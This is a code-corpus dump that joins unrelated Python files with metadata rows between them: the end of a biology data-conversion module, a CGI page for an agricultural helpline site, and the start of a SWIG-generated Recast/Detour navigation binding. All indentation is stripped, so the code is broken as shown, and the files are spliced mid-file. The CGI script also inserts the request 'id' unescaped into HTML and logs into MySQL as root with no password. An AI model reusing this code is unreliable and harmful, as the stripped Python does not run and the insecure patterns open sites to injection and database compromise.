elif key == "genomic_size":
entity["structures"].append({"format": key,
"value": str(val)})
elif key == "intron_count":
entity["structures"].append({"format": key,
"value": str(val)})
elif key == "std":
value["uncertainty"] = float(val)
elif key == "ar_cog":
entity["identifiers"].append({"namespace": key,
"value": val})
elif key == "cog":
entity["identifiers"].append({"namespace": key,
"value": val})
elif key == "quantification_method":
environment["condition"] = "Quantified via {}.".format(val)
values.append(value)
result.append({"entity": entity,
"genotype": genotype,
"values": values,
"environment": environment,
"source": source,
"identifier": {"namespace": "uniprot_id",
"value": obj.get("uniprot_id")},
"schema_version": schema_version,
"related": related})
else: #gmxxxxx
val = life.get("values")
entity["identifiers"].append({"namespace": "accession_id",
"value": life.get("accession_id")[:-1]})
related.append({"namespace": "gene_symbol",
"value": life.get("gene_symbol")})
source = life.get("reference")
for o in val:
value = {}
environment = {}
genotype = {}
for k, v in o.items():
if re.search(pattern, k):
value["value"] = v * 3600.0
genotype["cellLine"] = k
value["units"] = "s"
elif k == "note":
environment["condition"] = v
elif k == "biological_replicates":
environment["replicate"] = v
result.append({"entity": entity,
"genotype": genotype,
"values": [value],
"environment": environment,
"source": source,
"identifier": {"namespace": "uniprot_id",
"value": obj.get("uniprot_id")},
"schema_version": schema_version,
"related": related})
return result
def build_rna_modification_entity(self, obj):
"""build entity objects from rna_modification collection
Args:
obj (:obj:`Obj`): Object from which entity will be built.
Return:
(:obj:`Obj`)
"""
entity = {"type": "RNA", "schema_version": "2.0",
"name": obj["definition"], "related": [],
"identifiers": []}
entity["related"].append({"namespace": "amino_acid",
"value": obj["amino_acid"]})
entity["related"].append({"namespace": "aa_code",
"value": obj["aa_code"]})
entity["related"].append({"namespace": "aa_name",
"value": obj["aa_name"]})
entity["related"].append({"namespace": "kegg_orthology_id",
"value": obj["kegg_orthology_id"]})
entity["related"].append({"namespace": "kegg_orthology_name",
"value": obj["kegg_gene_name"]})
entity["related"].append({"namespace": "kegg_pathway_id",
"value": obj["kegg_pathway_id"]})
entity["related"].append({"namespace": "kegg_pathway_name",
"value": obj["kegg_pathway_name"]})
entity["identifiers"].append({"namespace": "amino_acid",
"value": obj["amino_acid"]})
return entity
def build_rna_modification_observation(self, obj):
"""Build observation objects from rna_modification collection.
Args:
obj (:obj:`Obj`): object from which observation objects will be built.
Return:
(:obj:`list` of :obj:`Obj`)
"""
result = []
entity = self.build_rna_modification_entity(obj)
for mod in obj["modifications"]:
genotype = {}
values = []
entity["stuctures"] = []
identifier = {"namespace": "sequence_bpforms",
"value": mod["sequence_bpforms"]}
if mod["ncbi_taxonomy_id"] is None:
genotype["taxon"] = self.build_taxon_object(mod["organism"], _format="tax_name")
else:
genotype["taxon"] = self.build_taxon_object(mod["ncbi_taxonomy_id"])
genotype["organ"] = mod["organellum"]
entity["stuctures"].append({"format": "sequence_modomics",
"value": mod["sequence_modomics"]})
entity["stuctures"].append({"format": "sequence_bpforms",
"value": mod["sequence_bpforms"]})
entity["stuctures"].append({"format": "sequence_iupac",
"value": mod["sequence_iupac"]})
values.append({"type": "length",
"value": mod["length"]})
values.append({"type": "anticodon",
"value": mod["anticodon"]})
values.append({"type": "number_of_modifications",
"value": mod["number_of_modifications"]})
values.append({"type": "number_of_modified_a",
"value": mod["number_of_modified_a"]})
values.append({"type": "number_of_modified_u",
"value": mod["number_of_modified_u"]})
values.append({"type": "number_of_modified_c",
"value": mod["number_of_modified_c"]})
values.append({"type": "number_of_modified_g",
"value": mod["number_of_modified_g"]})
values.append({"type": "formula",
"value": mod["formula"]})
values.append({"type": "molecular_weight",
"value": mod["molecular_weight"]})
values.append({"type": "charge",
"value": mod["charge"]})
values.append({"type": "canonical_formula",
"value": mod["canonical_formula"]})
values.append({"type": "canonical_molecular_weight",
"value": mod["canonical_molecular_weight"]})
values.append({"type": "canonical_charge",
"value": mod["canonical_charge"]})
values.append({"type": "bpforms_errors",
"value": mod["bpforms_errors"]})
source = [{"namespace": "doi",
"value": mod["reference"]["doi"]}]
result.append({"entity": entity,
"values": values,
"genotype": genotype,
"source": source,
"identifier": identifier,
"schema_version": "2.0"})
return result
def build_sabio_entity(self, obj):
"""Build entity objects from sabio_rk_old collection.
Args:
obj (:obj:`Obj`): object from which entity objects will be built.
Return:
(:obj:`Obj`)
"""
entity = {"type": "reaction"}
structures = [{"format": "reaction_equation", "enzyme": {"subunit": []}}]
identifiers = []
related = []
source = []
related.append({"namespace": "kinlaw_id",
"value": obj.get("kinlaw_id")})
resources = obj.get("resource", [{}])
for r in resources:
for key, val in r.items():
if key == "pubmed":
source.append({"namespace": key,
"value": val})
elif key == "ec-code":
related.append({"namespace": "ec_code",
"value": val})
elif key == "sabiork.reaction":
identifiers.append({"namespace": "sabio_rxn_id",
"value": val})
else:
with open("edgecase.txt", "a+") as f:
f.write("Kinetic law {} has more info in resources".format(obj["kinlaw_id"]))
enzymes_list = obj["enzymes"]
for e in enzymes_list:
if e.get("subunit") is not None:
for i, su in enumerate(e.get("subunit")):
structures[0]["enzyme"]["subunit"].append({"namespace": "uniprot_id",
"value": su.get("uniprot_id"),
"coefficient": su.get("subunit_coefficient")})
elif e.get("enzyme") is not None:
for i, en in enumerate(e.get("enzyme")):
structures[0]["enzyme"]["name"] = e.get("enzyme")[i]["enzyme_name"]
structures[0]["enzyme"]["id"] = e.get("enzyme")[i]["enzyme_id"]
elif e.get("compartment") is not None:
for i, en in enumerate(e.get("compartment")):
structures[0]["enzyme"]["compartment"] = e.get("compartment")[i]["compartment_name"]
parameters = obj["parameter"]
for p in parameters:
pass
def main():
pass
if __name__ == "__main__":
main() | 49.866255 | 124 | 0.417908 |
c7148b6fe938885b7ae45ebdd10814dadcb30270 | 5,449 | py | Python | student_soil_view.py | kowsalya2398/agrihelplinesystem | 2bb775fba84958fe1fdaf68538d05ede5f956bf7 | [
"MIT"
] | null | null | null | student_soil_view.py | kowsalya2398/agrihelplinesystem | 2bb775fba84958fe1fdaf68538d05ede5f956bf7 | [
"MIT"
] | null | null | null | student_soil_view.py | kowsalya2398/agrihelplinesystem | 2bb775fba84958fe1fdaf68538d05ede5f956bf7 | [
"MIT"
] | null | null | null | #!C:/Users/KowsRaji/AppData/Local/Programs/Python/Python37/python.exe
print("content-type:html \r\n\r\n")
import cgi,os
import cgitb; cgitb.enable()
import pymysql as ps
form = cgi.FieldStorage()
# Get filename here.
pid = form.getvalue("id")
conn=ps.connect("localhost","root","","myproject")
cur=conn.cursor()
print("""
<html>
<head>
<title>Agriofficer page</title>
<link rel="icon" type="images/ico" href="images/icon.jpg">
<link rel="stylesheet" type="text/css" href="bootstrap/css/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="bootstrap/styleTV.css">
<script src="bootstrap/jquery/jquery.min.js"></script>
<script src="bootstrap/js/bootstrap.min.js"></script>
<script language="javascript" type="text/javascript" src="username.js"></script>
<link rel="icon" type="image/ico" href="images/tv_logo.png">
<script type="text/javascript">
$(function()
{
$(this).bind('contextmenu',function()
{
return false;
})
})
</script>
</head>
<body>
<div id="header">
<div class="w3-container w3-teal">
<nav class="navbar navbar-inverse" style="background-color:transparent;border:none;">
<div class="container-fluid">
<div class="row">
<div class="col-sm-2">
<img src="images/agrilogo.jpg" class="img-responsive img-circle" style="margin-top:8px;">
</div>
<div class="col-sm-6">
<p id="font_head">AGRI HELPLINE SYSTEM</p>
</div>
<div class="col-sm-4">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
<span class="icon-bar"></span>
<span class="icon-bar "></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#"></a>
</div>
<div class="collapse navbar-collapse" id="myNavbar" style="float:right;">
<ul class="nav navbar-nav" style="padding:20px;color:white;">
<li style="padding-left:5px;padding-top:10px;color:red;" id="font_menu"><p id="name">agri_officer</p></li>
<li style="padding-left:5px;"><a href="agri_homepage.py" id="font_menu"><span class="glyphicon glyphicon-log-out"></span>  Logout</a></li>
</ul>
</div>
</div>
</div>
</div>
</nav>
</div>
</div>
<!-- Body content-->
<div id="content_body">
<!-- Dashboard -->
<div id="throbber" style="display:none; min-height:120px;"></div>
<div id="noty-holder"></div>
<div id="wrapper">
<div class="collapse navbar-collapse navbar-ex1-collapse" role="navigation">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="http://cijulenlinea.ucr.ac.cr/dev-users/"></a>
</div>
<ul class="nav navbar-nav side-nav">
<li>
<a href="student_profile.py?id=%s" data-toggle="collapse" data-target="#submenu-1" id="font_dash"><i class="fa fa-fw fa-search"></i>Profile<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:100px;"></span></a>
</li>
<li>
<a href="student_soil_view.py?id=%s" data-toggle="collapse" data-target="#submenu-2" id="font_dash"><i class="fa fa-fw fa-star"></i>Soil Information<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:138px;"></span></a>
</li>
<li>
<a href="student_crop_view.py?id=%s" data-toggle="collapse" data-target="#submenu-3" id="font_dash"><i class="fa fa-fw fa-star"></i>Crop information<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:138px;"></span></a>
</li>
<li>
<a href="student_govtschm_view.py?id=%s" data-toggle="collapse" data-target="#submenu-3" id="font_dash"><i class="fa fa-fw fa-star"></i>Government Schemes<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:138px;"></span></a>
</li>
<li>
<a href="student_query_req.py?id=%s" data-toggle="collapse" data-target="#submenu-4" id="font_dash"><i class="fa fa-fw fa-star"></i>Queries<i class="fa fa-fw fa-angle-down pull-right"></i><span style="padding-left:138px;"></span></a>
</li>
</ul>
</div>
</div>
</div>
<!-- Page content -->
<div style="margin-left:260px;margin-top:100px;">
<div id="page-wrapper">
<div class="container-fluid">
<div class="row" id="main">
<div class="col-sm-12 col-md-12 well">""" %(pid,pid,pid,pid,pid))
sql="""select * from soil_vdo"""
cur.execute(sql)
r=cur.fetchall()
print("""<table><tr><th>File Description</th><th>File</th></tr>""")
for i in r:
filename="files/"+i[1]
print("""<tr><td>%s</td><td><video width="200" height="200" controls>
<source src='%s' type="video/mp4">
</video></td></tr>""" % (i[2],filename))
print("""</table>""")
print("""
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
""")
| 37.840278 | 276 | 0.580841 |
e69a723627dfa11626dee3249c847ba20487b06d | 99,914 | py | Python | src/framework/navigation/pyrecast.py | villawang/SNAP | 3c899151e5c1f9f76c65f8eee164453ed5eef3e8 | [
"BSD-3-Clause"
] | 25 | 2015-01-19T20:09:31.000Z | 2022-03-04T12:49:05.000Z | src/framework/navigation/pyrecast.py | villawang/SNAP | 3c899151e5c1f9f76c65f8eee164453ed5eef3e8 | [
"BSD-3-Clause"
] | 2 | 2016-01-16T00:00:24.000Z | 2019-08-17T03:38:11.000Z | src/framework/navigation/pyrecast.py | villawang/SNAP | 3c899151e5c1f9f76c65f8eee164453ed5eef3e8 | [
"BSD-3-Clause"
] | 15 | 2015-10-22T18:18:00.000Z | 2020-07-01T08:17:21.000Z | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.6
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_pyrecast', [dirname(__file__)])
except ImportError:
import _pyrecast
return _pyrecast
if fp is not None:
try:
_mod = imp.load_module('_pyrecast', fp, pathname, description)
finally:
fp.close()
return _mod
_pyrecast = swig_import_helper()
del swig_import_helper
else:
import _pyrecast
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def dtStatusSucceed(*args):
return _pyrecast.dtStatusSucceed(*args)
dtStatusSucceed = _pyrecast.dtStatusSucceed
def dtStatusFailed(*args):
return _pyrecast.dtStatusFailed(*args)
dtStatusFailed = _pyrecast.dtStatusFailed
def dtStatusInProgress(*args):
return _pyrecast.dtStatusInProgress(*args)
dtStatusInProgress = _pyrecast.dtStatusInProgress
def dtStatusDetail(*args):
return _pyrecast.dtStatusDetail(*args)
dtStatusDetail = _pyrecast.dtStatusDetail
DT_ALLOC_PERM = _pyrecast.DT_ALLOC_PERM
DT_ALLOC_TEMP = _pyrecast.DT_ALLOC_TEMP
def dtAllocSetCustom(*args):
return _pyrecast.dtAllocSetCustom(*args)
dtAllocSetCustom = _pyrecast.dtAllocSetCustom
def dtAlloc(*args):
return _pyrecast.dtAlloc(*args)
dtAlloc = _pyrecast.dtAlloc
def dtFree(*args):
return _pyrecast.dtFree(*args)
dtFree = _pyrecast.dtFree
def dtPoint3(*args):
return _pyrecast.dtPoint3(*args)
dtPoint3 = _pyrecast.dtPoint3
def dtSqrt(*args):
return _pyrecast.dtSqrt(*args)
dtSqrt = _pyrecast.dtSqrt
def dtVcross(*args):
return _pyrecast.dtVcross(*args)
dtVcross = _pyrecast.dtVcross
def dtVdot(*args):
return _pyrecast.dtVdot(*args)
dtVdot = _pyrecast.dtVdot
def dtVmad(*args):
return _pyrecast.dtVmad(*args)
dtVmad = _pyrecast.dtVmad
def dtVlerp(*args):
return _pyrecast.dtVlerp(*args)
dtVlerp = _pyrecast.dtVlerp
def dtVadd(*args):
return _pyrecast.dtVadd(*args)
dtVadd = _pyrecast.dtVadd
def dtVsub(*args):
return _pyrecast.dtVsub(*args)
dtVsub = _pyrecast.dtVsub
def dtVscale(*args):
return _pyrecast.dtVscale(*args)
dtVscale = _pyrecast.dtVscale
def dtVmin(*args):
return _pyrecast.dtVmin(*args)
dtVmin = _pyrecast.dtVmin
def dtVmax(*args):
return _pyrecast.dtVmax(*args)
dtVmax = _pyrecast.dtVmax
def dtVset(*args):
return _pyrecast.dtVset(*args)
dtVset = _pyrecast.dtVset
def dtVcopy(*args):
return _pyrecast.dtVcopy(*args)
dtVcopy = _pyrecast.dtVcopy
def dtVlen(*args):
return _pyrecast.dtVlen(*args)
dtVlen = _pyrecast.dtVlen
def dtVlenSqr(*args):
return _pyrecast.dtVlenSqr(*args)
dtVlenSqr = _pyrecast.dtVlenSqr
def dtVdist(*args):
return _pyrecast.dtVdist(*args)
dtVdist = _pyrecast.dtVdist
def dtVdistSqr(*args):
return _pyrecast.dtVdistSqr(*args)
dtVdistSqr = _pyrecast.dtVdistSqr
def dtVdist2D(*args):
return _pyrecast.dtVdist2D(*args)
dtVdist2D = _pyrecast.dtVdist2D
def dtVdist2DSqr(*args):
return _pyrecast.dtVdist2DSqr(*args)
dtVdist2DSqr = _pyrecast.dtVdist2DSqr
def dtVnormalize(*args):
return _pyrecast.dtVnormalize(*args)
dtVnormalize = _pyrecast.dtVnormalize
def dtVequal(*args):
return _pyrecast.dtVequal(*args)
dtVequal = _pyrecast.dtVequal
def dtVdot2D(*args):
return _pyrecast.dtVdot2D(*args)
dtVdot2D = _pyrecast.dtVdot2D
def dtVperp2D(*args):
return _pyrecast.dtVperp2D(*args)
dtVperp2D = _pyrecast.dtVperp2D
def dtTriArea2D(*args):
return _pyrecast.dtTriArea2D(*args)
dtTriArea2D = _pyrecast.dtTriArea2D
def dtOverlapQuantBounds(*args):
return _pyrecast.dtOverlapQuantBounds(*args)
dtOverlapQuantBounds = _pyrecast.dtOverlapQuantBounds
def dtOverlapBounds(*args):
return _pyrecast.dtOverlapBounds(*args)
dtOverlapBounds = _pyrecast.dtOverlapBounds
def dtClosestPtPointTriangle(*args):
return _pyrecast.dtClosestPtPointTriangle(*args)
dtClosestPtPointTriangle = _pyrecast.dtClosestPtPointTriangle
def dtClosestHeightPointTriangle(*args):
return _pyrecast.dtClosestHeightPointTriangle(*args)
dtClosestHeightPointTriangle = _pyrecast.dtClosestHeightPointTriangle
def dtIntersectSegmentPoly2D(*args):
return _pyrecast.dtIntersectSegmentPoly2D(*args)
dtIntersectSegmentPoly2D = _pyrecast.dtIntersectSegmentPoly2D
def dtIntersectSegSeg2D(*args):
return _pyrecast.dtIntersectSegSeg2D(*args)
dtIntersectSegSeg2D = _pyrecast.dtIntersectSegSeg2D
def dtPointInPolygon(*args):
return _pyrecast.dtPointInPolygon(*args)
dtPointInPolygon = _pyrecast.dtPointInPolygon
def dtDistancePtPolyEdgesSqr(*args):
return _pyrecast.dtDistancePtPolyEdgesSqr(*args)
dtDistancePtPolyEdgesSqr = _pyrecast.dtDistancePtPolyEdgesSqr
def dtDistancePtSegSqr2D(*args):
return _pyrecast.dtDistancePtSegSqr2D(*args)
dtDistancePtSegSqr2D = _pyrecast.dtDistancePtSegSqr2D
def dtCalcPolyCenter(*args):
return _pyrecast.dtCalcPolyCenter(*args)
dtCalcPolyCenter = _pyrecast.dtCalcPolyCenter
def dtOverlapPolyPoly2D(*args):
return _pyrecast.dtOverlapPolyPoly2D(*args)
dtOverlapPolyPoly2D = _pyrecast.dtOverlapPolyPoly2D
def dtNextPow2(*args):
return _pyrecast.dtNextPow2(*args)
dtNextPow2 = _pyrecast.dtNextPow2
def dtIlog2(*args):
return _pyrecast.dtIlog2(*args)
dtIlog2 = _pyrecast.dtIlog2
def dtAlign4(*args):
return _pyrecast.dtAlign4(*args)
dtAlign4 = _pyrecast.dtAlign4
def dtOppositeTile(*args):
return _pyrecast.dtOppositeTile(*args)
dtOppositeTile = _pyrecast.dtOppositeTile
def dtSwapByte(*args):
return _pyrecast.dtSwapByte(*args)
dtSwapByte = _pyrecast.dtSwapByte
def dtSwapEndian(*args):
return _pyrecast.dtSwapEndian(*args)
dtSwapEndian = _pyrecast.dtSwapEndian
def dtRandomPointInConvexPoly(*args):
return _pyrecast.dtRandomPointInConvexPoly(*args)
dtRandomPointInConvexPoly = _pyrecast.dtRandomPointInConvexPoly
DT_TILE_FREE_DATA = _pyrecast.DT_TILE_FREE_DATA
DT_STRAIGHTPATH_START = _pyrecast.DT_STRAIGHTPATH_START
DT_STRAIGHTPATH_END = _pyrecast.DT_STRAIGHTPATH_END
DT_STRAIGHTPATH_OFFMESH_CONNECTION = _pyrecast.DT_STRAIGHTPATH_OFFMESH_CONNECTION
DT_STRAIGHTPATH_AREA_CROSSINGS = _pyrecast.DT_STRAIGHTPATH_AREA_CROSSINGS
DT_STRAIGHTPATH_ALL_CROSSINGS = _pyrecast.DT_STRAIGHTPATH_ALL_CROSSINGS
DT_POLYTYPE_GROUND = _pyrecast.DT_POLYTYPE_GROUND
DT_POLYTYPE_OFFMESH_CONNECTION = _pyrecast.DT_POLYTYPE_OFFMESH_CONNECTION
class dtPoly(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtPoly, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtPoly, name)
__repr__ = _swig_repr
__swig_setmethods__["firstLink"] = _pyrecast.dtPoly_firstLink_set
__swig_getmethods__["firstLink"] = _pyrecast.dtPoly_firstLink_get
if _newclass:firstLink = _swig_property(_pyrecast.dtPoly_firstLink_get, _pyrecast.dtPoly_firstLink_set)
__swig_setmethods__["verts"] = _pyrecast.dtPoly_verts_set
__swig_getmethods__["verts"] = _pyrecast.dtPoly_verts_get
if _newclass:verts = _swig_property(_pyrecast.dtPoly_verts_get, _pyrecast.dtPoly_verts_set)
__swig_setmethods__["neis"] = _pyrecast.dtPoly_neis_set
__swig_getmethods__["neis"] = _pyrecast.dtPoly_neis_get
if _newclass:neis = _swig_property(_pyrecast.dtPoly_neis_get, _pyrecast.dtPoly_neis_set)
__swig_setmethods__["flags"] = _pyrecast.dtPoly_flags_set
__swig_getmethods__["flags"] = _pyrecast.dtPoly_flags_get
if _newclass:flags = _swig_property(_pyrecast.dtPoly_flags_get, _pyrecast.dtPoly_flags_set)
__swig_setmethods__["vertCount"] = _pyrecast.dtPoly_vertCount_set
__swig_getmethods__["vertCount"] = _pyrecast.dtPoly_vertCount_get
if _newclass:vertCount = _swig_property(_pyrecast.dtPoly_vertCount_get, _pyrecast.dtPoly_vertCount_set)
__swig_setmethods__["areaAndtype"] = _pyrecast.dtPoly_areaAndtype_set
__swig_getmethods__["areaAndtype"] = _pyrecast.dtPoly_areaAndtype_get
if _newclass:areaAndtype = _swig_property(_pyrecast.dtPoly_areaAndtype_get, _pyrecast.dtPoly_areaAndtype_set)
def setArea(self, *args): return _pyrecast.dtPoly_setArea(self, *args)
def setType(self, *args): return _pyrecast.dtPoly_setType(self, *args)
def getArea(self): return _pyrecast.dtPoly_getArea(self)
def getType(self): return _pyrecast.dtPoly_getType(self)
def __init__(self):
this = _pyrecast.new_dtPoly()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtPoly
__del__ = lambda self : None;
dtPoly_swigregister = _pyrecast.dtPoly_swigregister
dtPoly_swigregister(dtPoly)
cvar = _pyrecast.cvar
DT_FAILURE = cvar.DT_FAILURE
DT_SUCCESS = cvar.DT_SUCCESS
DT_IN_PROGRESS = cvar.DT_IN_PROGRESS
DT_STATUS_DETAIL_MASK = cvar.DT_STATUS_DETAIL_MASK
DT_WRONG_MAGIC = cvar.DT_WRONG_MAGIC
DT_WRONG_VERSION = cvar.DT_WRONG_VERSION
DT_OUT_OF_MEMORY = cvar.DT_OUT_OF_MEMORY
DT_INVALID_PARAM = cvar.DT_INVALID_PARAM
DT_BUFFER_TOO_SMALL = cvar.DT_BUFFER_TOO_SMALL
DT_OUT_OF_NODES = cvar.DT_OUT_OF_NODES
DT_PARTIAL_RESULT = cvar.DT_PARTIAL_RESULT
DT_VERTS_PER_POLYGON = cvar.DT_VERTS_PER_POLYGON
DT_NAVMESH_MAGIC = cvar.DT_NAVMESH_MAGIC
DT_NAVMESH_VERSION = cvar.DT_NAVMESH_VERSION
DT_NAVMESH_STATE_MAGIC = cvar.DT_NAVMESH_STATE_MAGIC
DT_NAVMESH_STATE_VERSION = cvar.DT_NAVMESH_STATE_VERSION
DT_EXT_LINK = cvar.DT_EXT_LINK
DT_NULL_LINK = cvar.DT_NULL_LINK
DT_OFFMESH_CON_BIDIR = cvar.DT_OFFMESH_CON_BIDIR
DT_MAX_AREAS = cvar.DT_MAX_AREAS
class dtPolyDetail(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtPolyDetail, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtPolyDetail, name)
__repr__ = _swig_repr
__swig_setmethods__["vertBase"] = _pyrecast.dtPolyDetail_vertBase_set
__swig_getmethods__["vertBase"] = _pyrecast.dtPolyDetail_vertBase_get
if _newclass:vertBase = _swig_property(_pyrecast.dtPolyDetail_vertBase_get, _pyrecast.dtPolyDetail_vertBase_set)
__swig_setmethods__["triBase"] = _pyrecast.dtPolyDetail_triBase_set
__swig_getmethods__["triBase"] = _pyrecast.dtPolyDetail_triBase_get
if _newclass:triBase = _swig_property(_pyrecast.dtPolyDetail_triBase_get, _pyrecast.dtPolyDetail_triBase_set)
__swig_setmethods__["vertCount"] = _pyrecast.dtPolyDetail_vertCount_set
__swig_getmethods__["vertCount"] = _pyrecast.dtPolyDetail_vertCount_get
if _newclass:vertCount = _swig_property(_pyrecast.dtPolyDetail_vertCount_get, _pyrecast.dtPolyDetail_vertCount_set)
__swig_setmethods__["triCount"] = _pyrecast.dtPolyDetail_triCount_set
__swig_getmethods__["triCount"] = _pyrecast.dtPolyDetail_triCount_get
if _newclass:triCount = _swig_property(_pyrecast.dtPolyDetail_triCount_get, _pyrecast.dtPolyDetail_triCount_set)
def __init__(self):
this = _pyrecast.new_dtPolyDetail()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtPolyDetail
__del__ = lambda self : None;
dtPolyDetail_swigregister = _pyrecast.dtPolyDetail_swigregister
dtPolyDetail_swigregister(dtPolyDetail)
class dtLink(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtLink, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtLink, name)
__repr__ = _swig_repr
__swig_setmethods__["ref"] = _pyrecast.dtLink_ref_set
__swig_getmethods__["ref"] = _pyrecast.dtLink_ref_get
if _newclass:ref = _swig_property(_pyrecast.dtLink_ref_get, _pyrecast.dtLink_ref_set)
__swig_setmethods__["next"] = _pyrecast.dtLink_next_set
__swig_getmethods__["next"] = _pyrecast.dtLink_next_get
if _newclass:next = _swig_property(_pyrecast.dtLink_next_get, _pyrecast.dtLink_next_set)
__swig_setmethods__["edge"] = _pyrecast.dtLink_edge_set
__swig_getmethods__["edge"] = _pyrecast.dtLink_edge_get
if _newclass:edge = _swig_property(_pyrecast.dtLink_edge_get, _pyrecast.dtLink_edge_set)
__swig_setmethods__["side"] = _pyrecast.dtLink_side_set
__swig_getmethods__["side"] = _pyrecast.dtLink_side_get
if _newclass:side = _swig_property(_pyrecast.dtLink_side_get, _pyrecast.dtLink_side_set)
__swig_setmethods__["bmin"] = _pyrecast.dtLink_bmin_set
__swig_getmethods__["bmin"] = _pyrecast.dtLink_bmin_get
if _newclass:bmin = _swig_property(_pyrecast.dtLink_bmin_get, _pyrecast.dtLink_bmin_set)
__swig_setmethods__["bmax"] = _pyrecast.dtLink_bmax_set
__swig_getmethods__["bmax"] = _pyrecast.dtLink_bmax_get
if _newclass:bmax = _swig_property(_pyrecast.dtLink_bmax_get, _pyrecast.dtLink_bmax_set)
def __init__(self):
this = _pyrecast.new_dtLink()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtLink
__del__ = lambda self : None;
dtLink_swigregister = _pyrecast.dtLink_swigregister
dtLink_swigregister(dtLink)
class dtBVNode(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtBVNode, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtBVNode, name)
__repr__ = _swig_repr
__swig_setmethods__["bmin"] = _pyrecast.dtBVNode_bmin_set
__swig_getmethods__["bmin"] = _pyrecast.dtBVNode_bmin_get
if _newclass:bmin = _swig_property(_pyrecast.dtBVNode_bmin_get, _pyrecast.dtBVNode_bmin_set)
__swig_setmethods__["bmax"] = _pyrecast.dtBVNode_bmax_set
__swig_getmethods__["bmax"] = _pyrecast.dtBVNode_bmax_get
if _newclass:bmax = _swig_property(_pyrecast.dtBVNode_bmax_get, _pyrecast.dtBVNode_bmax_set)
__swig_setmethods__["i"] = _pyrecast.dtBVNode_i_set
__swig_getmethods__["i"] = _pyrecast.dtBVNode_i_get
if _newclass:i = _swig_property(_pyrecast.dtBVNode_i_get, _pyrecast.dtBVNode_i_set)
def __init__(self):
this = _pyrecast.new_dtBVNode()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtBVNode
__del__ = lambda self : None;
dtBVNode_swigregister = _pyrecast.dtBVNode_swigregister
dtBVNode_swigregister(dtBVNode)
class dtOffMeshConnection(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtOffMeshConnection, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtOffMeshConnection, name)
__repr__ = _swig_repr
__swig_setmethods__["pos"] = _pyrecast.dtOffMeshConnection_pos_set
__swig_getmethods__["pos"] = _pyrecast.dtOffMeshConnection_pos_get
if _newclass:pos = _swig_property(_pyrecast.dtOffMeshConnection_pos_get, _pyrecast.dtOffMeshConnection_pos_set)
__swig_setmethods__["rad"] = _pyrecast.dtOffMeshConnection_rad_set
__swig_getmethods__["rad"] = _pyrecast.dtOffMeshConnection_rad_get
if _newclass:rad = _swig_property(_pyrecast.dtOffMeshConnection_rad_get, _pyrecast.dtOffMeshConnection_rad_set)
__swig_setmethods__["poly"] = _pyrecast.dtOffMeshConnection_poly_set
__swig_getmethods__["poly"] = _pyrecast.dtOffMeshConnection_poly_get
if _newclass:poly = _swig_property(_pyrecast.dtOffMeshConnection_poly_get, _pyrecast.dtOffMeshConnection_poly_set)
__swig_setmethods__["flags"] = _pyrecast.dtOffMeshConnection_flags_set
__swig_getmethods__["flags"] = _pyrecast.dtOffMeshConnection_flags_get
if _newclass:flags = _swig_property(_pyrecast.dtOffMeshConnection_flags_get, _pyrecast.dtOffMeshConnection_flags_set)
__swig_setmethods__["side"] = _pyrecast.dtOffMeshConnection_side_set
__swig_getmethods__["side"] = _pyrecast.dtOffMeshConnection_side_get
if _newclass:side = _swig_property(_pyrecast.dtOffMeshConnection_side_get, _pyrecast.dtOffMeshConnection_side_set)
__swig_setmethods__["userId"] = _pyrecast.dtOffMeshConnection_userId_set
__swig_getmethods__["userId"] = _pyrecast.dtOffMeshConnection_userId_get
if _newclass:userId = _swig_property(_pyrecast.dtOffMeshConnection_userId_get, _pyrecast.dtOffMeshConnection_userId_set)
